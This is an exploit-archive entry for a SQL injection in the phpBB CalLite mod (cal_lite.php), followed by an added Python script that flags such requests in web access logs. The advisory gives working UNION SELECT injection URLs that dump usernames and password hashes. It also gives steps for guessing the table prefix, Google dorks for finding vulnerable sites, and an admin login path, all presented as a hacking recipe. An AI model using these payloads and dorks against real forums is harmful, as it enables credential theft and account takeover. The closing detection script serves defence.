Topic : phpBB CalLite Mod (cal_lite.php) SQL Injection
ExploitAlert : 3679
Credit : S@BUN
Date : 06.04.2008
Exploit Code :
#########################################
#
# RECORD PAGES ABOUT phpBB GOOD LUCKY
#
##########################################
##########################################
#
# Powered by phpBB (cal_lite.php) SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
#############################################
***INFORMATION***
You must change the table name (you need to change something).
Where I wrote S@BUN, you must write the site name before _users (site.name.here_users), but only the first single word; there are examples below.
/S@BUN_users/*<<< YOU MUST CHANGE S@BUN to the site name (only the first single word)
#############################################
EXAMPLES 1
http://[victim].com/cal_lite.php?cl_d=10&cl_m=-99999/**/union/**/select/**/concat(user_id,char(58),username,char(58),user_password),concat(user_id,char(58),username,char(58),user_password),11111/**/from/**/[victim]_users/*
The site name is http://[victim].com, so we will use /**/from/**/[victim]_users/*
EXAMPLES 2
http://[victim].com/cal_lite.php?cl_d=10&cl_m=-99999/**/union/**/select/**/concat(user_id,char(58),username,char(58),user_password),concat(user_id,char(58),username,char(58),user_password),11111/**/from/**/[victim]_users/*
AGAIN WE CHANGED /**/from/**/[victim]_users/* (WITH SITE NAME [victim])
EXAMPLES 3
http://[victim]/cal_lite.php?cl_d=10&cl_m=-99999/**/union/**/select/**/concat(user_id,char(58),username,char(58),user_password),concat(user_id,char(58),username,char(58),user_password),11111/**/from/**/[victim]_users/*
WE CHANGED AGAIN /**/from/**/[victim]_users/* (SITE FIRST NAME [victim])
##################################################
#
# DORK 1 : allinurl: "cal_lite php"
#
# DORK 2 : allinurl: "cal_lite php cl_d"cl_m
#
# DORK 3 : allinurl: "foros.ws/cal_lite.php"
#
# DORK 4 : allinurl: "ief.st/cal_lite.php"
#
# *****do not use only Google, and search by country, because there are many sites*****
#
##################################################
EXPLOiT::
Don't forget to change /from/**/(HERE.SITE.NAME)_users/*: write the site name where it says (HERE.SITE.NAME).
cal_lite.php?cl_d=1&cl_m=-99999/**/union/**/select/**/concat(user_id,char(58),username,char(58),user_password),concat(user_id,char(58),username,char(58),user_password),11111/**/from/**/(HERE.SITE.NAME)_users/*
admin login>>>> www.XXXsiteXXXX.com/login.php?redirect=admin/index.php
AND DON'T FORGET YOU MUST ENTER THE PHPBB PASSWORD 2 TIMES; IT IS NOT ACCEPTED THE FIRST TIME
##################################################
AND YOU WILL SEE ALL USERS PASSWORD
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
##########################################
#
# GOOD LUCK TO FENERBAHCE IN THE CHELSEA MATCH
#
##########################################
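A defender-side check for the request shape shown above, as an added example that is not part of the original advisory or of the phpBB/CalLite code: it scans web access-log lines for cal_lite.php requests whose cl_d or cl_m value is not a plain integer, and notes when the value contains a UNION SELECT once /**/ comments are normalized. The log lines are constructed; the combined log format, the 1-4 digit limit, and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Apr/2008:10:01:02 +0000] "GET /cal_lite.php?cl_d=10&cl_m=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Apr/2008:10:02:11 +0000] "GET /forum/cal_lite.php?cl_d=10&cl_m=-99999'
    '/**/union/**/select/**/1,2,3/**/from/**/example_users/* HTTP/1.1" 200 7342',
    '198.51.100.8 - - [06/Apr/2008:10:03:40 +0000] '
    '"GET /cal_lite.php?cl_d=1&cl_m=1%20UnIoN%20SeLeCt%201,2,3 HTTP/1.1" 200 7001',
    '203.0.113.5 - - [06/Apr/2008:10:04:09 +0000] "GET /cal_lite.php?cl_d=abc&cl_m=4 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [06/Apr/2008:10:04:30 +0000] "GET /index.php?cl_m=x HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[0-9.]+"')
PLAIN_INT = re.compile(r"[0-9]{1,4}")          # assumption: day/month/year-sized integers
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # /**/ used in place of spaces
UNION_SELECT = re.compile(r"\bunion\s+select\b", re.I)
WATCHED = {"cl_d", "cl_m"}                     # parameters named in the advisory


def classify(value):
    """Return None for a plain integer, otherwise a short reason string."""
    if PLAIN_INT.fullmatch(value):
        return None
    normalized = SQL_COMMENT.sub(" ", value)   # turn inline comments back into spaces
    return "union-select" if UNION_SELECT.search(normalized) else "non-integer"


def suspicious_requests(lines):
    """Return (client_ip, parameter, reason) for each flagged cal_lite.php request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/cal_lite.php"):
            continue
        # parse_qsl percent-decodes values, so encoded payloads are checked too
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            reason = classify(value) if name in WATCHED else None
            if reason:
                hits.append((line.split()[0], name, reason))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(*hit)
```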